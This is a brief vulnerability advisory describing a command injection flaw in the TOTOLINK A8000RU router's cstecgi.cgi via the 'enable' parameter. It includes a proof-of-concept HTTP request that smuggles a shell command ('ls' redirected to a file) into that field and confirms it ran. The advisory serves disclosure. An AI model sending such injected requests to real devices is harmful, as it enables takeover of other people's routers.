# Summary of Command Injection Vulnerability in A8000RU ## Vulnerability Overview A command injection vulnerability exists in the TOTOLINK A8000RU router. In `cstecgi.cgi`, an attacker can execute arbitrary operating system commands by crafting a malicious request that exploits the `enable` parameter. ## Affected Scope - **Vendor**: TOTOLINK - **Product**: A8000RU - **Version**: 7.1cu.643_b20200521 - **Vulnerability Type**: Command Injection ## Remediation No specific remediation steps or patches are currently provided on the vendor's page. It is recommended to contact the vendor to obtain updates. ## Proof of Concept (PoC) ### HTTP Request Example ```http POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: 192.168.6.2 Content-Length: 76 X-Requested-With: XMLHttpRequest Accept-Language: en-US,en;q=0.9 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.6.2 Referer: http://192.168.6.2/basic/index.html Accept-Encoding: gzip, deflate, br Cookie: SESSION_ID=2172465792.2 Connection: keep-alive {"topicUrl":"setPptpServerCfg","enable":"ls>./setPptpServerCfg.txt"} ``` ### Exploitation Result After executing the above request, the router successfully created the `setPptpServerCfg.txt` file. The file contains a list of filenames from the target directory, confirming that the command `ls>./setPptpServerCfg.txt` was executed successfully.